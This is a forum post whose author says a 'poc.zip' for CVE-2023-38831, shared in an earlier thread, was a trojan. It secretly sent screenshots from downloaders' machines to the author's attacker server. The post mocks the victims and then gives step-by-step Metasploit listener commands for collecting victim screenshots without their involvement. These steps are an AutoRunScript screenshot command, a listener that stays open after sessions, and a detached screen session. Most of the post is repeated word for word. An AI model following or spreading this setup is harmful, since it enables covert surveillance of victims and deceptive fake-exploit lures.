Ultima modifica:
These screenshots came from several VMs, these OS are likely honeypots with no sensitive data from unknown guys, who downloaded and tested "poc.zip". In my previous thread about CVE-2023-38831, I've stated the payload is going to grab a screenshot from the target device, but what I "forgot" to tell you... these screenshots are saved on my attacker server, not your VM. This is, how social engineering works, the combination of a legitimate-looking file and some tricky words... You got pwned.
However, this attack was stupid, serving as mere example. In a real world scenario, you can expect something way more nasty than a simple screen-stealer payload, like ransomware, and more scamming tactics to get their hands on your device. I hope you get cringed enough today, cya.
[UPDATE: poc.zip malicious attachment no longer "weaponized" in previous thread, becouse attacker server is off]
The screenshots were collected passively, without user interaction, exploiting a special Linux+MSF listener configuration:
to emulate my gathering technique, type in your terminal
"screen"
in that screen session, run msfconsole
type "AutoRunScript -> multi_console_command -c screenshot"
set "ExitOnSession -> false"
exploit -j
Now, hold "ctrl+d" to detach this channel from terminal
type "screen -ls" to display current screen session
screen -r [PID] to connect back the detached session, to check listener status
Configured in this way, your MSF istance will run in an isolated thread forever, this thread will not crash even if your SSH session dies. You can fly for holidays while your server will passively grab screenshots for you, as long it's running.
However, this attack was stupid, serving as mere example. In a real world scenario, you can expect something way more nasty than a simple screen-stealer payload, like ransomware, and more scamming tactics to get their hands on your device. I hope you get cringed enough today, cya.
[UPDATE: poc.zip malicious attachment no longer "weaponized" in previous thread, becouse attacker server is off]
The screenshots were collected passively, without user interaction, exploiting a special Linux+MSF listener configuration:
to emulate my gathering technique, type in your terminal
"screen"
in that screen session, run msfconsole
type "AutoRunScript -> multi_console_command -c screenshot"
set "ExitOnSession -> false"
exploit -j
Now, hold "ctrl+d" to detach this channel from terminal
type "screen -ls" to display current screen session
screen -r [PID] to connect back the detached session, to check listener status
Configured in this way, your MSF istance will run in an isolated thread forever, this thread will not crash even if your SSH session dies. You can fly for holidays while your server will passively grab screenshots for you, as long it's running.
